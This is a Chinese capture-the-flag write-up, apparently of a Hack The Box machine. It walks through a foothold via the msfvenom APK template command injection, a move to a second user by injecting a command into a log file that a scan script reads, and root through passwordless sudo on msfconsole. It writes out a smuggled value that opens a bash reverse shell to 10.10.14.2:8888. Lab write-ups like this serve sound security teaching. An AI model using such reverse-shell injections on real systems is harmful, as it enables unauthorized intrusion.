目录
简介
该靶机比较简单,但在漏洞发现的过程中花费的时间较多。通过msfvenom APK模板命令注入漏洞获得kid用户shell,然后通过shell脚本读取的文件内容可控,构造恶意命令获得pwn用户的shell,最后利用sudo权限滥用获得root权限的shell。
信息收集
使用nmap扫描目标主机端口及服务信息,发现5000端口运行着Werkzeug httpd 0.16.1 (Python 3.8.5)服务,操作系统为Ubuntu,如图:
访问5000端口发现是简单的黑客工具页面,如图:
使用Google搜索发现Werkzeug Debug Shell远程代码执行漏洞,但是该靶机并不适用。使用该页面的nmap扫描127.0.0.1,发现目标主机运行Nmap 7.80版本,如图:
使用Google和exploit-db搜索该版本漏洞未发现可GetShell的漏洞。使用Google和exploit-db搜索venom漏洞发现APK模板命令注入漏洞,如图:
漏洞发现
在nmap扫描功能处尝试命令注入、模板文件上传功能处上传绕过、searchsploit功能处SQL注入均未成功。使用exploit-db提供的EXP测试发现没有jarsigner命令,需要执行sudo apt-get install openjdk-11-jdk-headless,然后修改Payload,如图:
然后运行该EXP生成apk模板,如图:
在本地开启443端口的监听,将该文件进行上传,如图:
本地443端口可发现请求信息,如图:
漏洞利用
修改Payload为反弹shell的命令,然后重复上述过程获得kid用户shell,如图:
权限提升
使用提权辅助脚本发现新用户pwn,如图:
在pwn家目录下发现其它文件,如图:
查看pwn目录下的文件,发现scanlosers.sh会一直扫描/home/kid/logs/hackers文件中的ip,如图:
但是该shell脚本未对hackers文件传入的内容做过滤,且/home/kid/logs/hackers文件当前用户kid可编辑,如图:
因此可以通过写入恶意代码“test ;/bin/bash -c 'bash -i >&/dev/tcp/10.10.14.2/8888 0>&1' #”,利用命令注入获得pwn用户的shell,如图:
此时shell脚本中扫描命令变为sh -c "nmap --top-ports 10 -oN recon/test ;/bin/bash -c 'bash -i >&/dev/tcp/10.10.14.2/8888 0>&1' #.nmap test ;/bin/bash -c 'bash -i >&/dev/tcp/10.10.14.2/8888 0>&1' # 2>/dev/null" &,本地监听的端口成功获得pwn用户的shell,如图:
发现不需要密码的sudo程序,如图:
直接执行sudo /opt/metasploit-framework-6.0.9/msfconsole,如图:
总结
该靶机的难度在立足点,5000端口的服务后端用python3写的,不容易找到msfvenom的漏洞。感谢HTB论坛兄弟的提示,找到立足点后剩下的就很容易了。
617
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
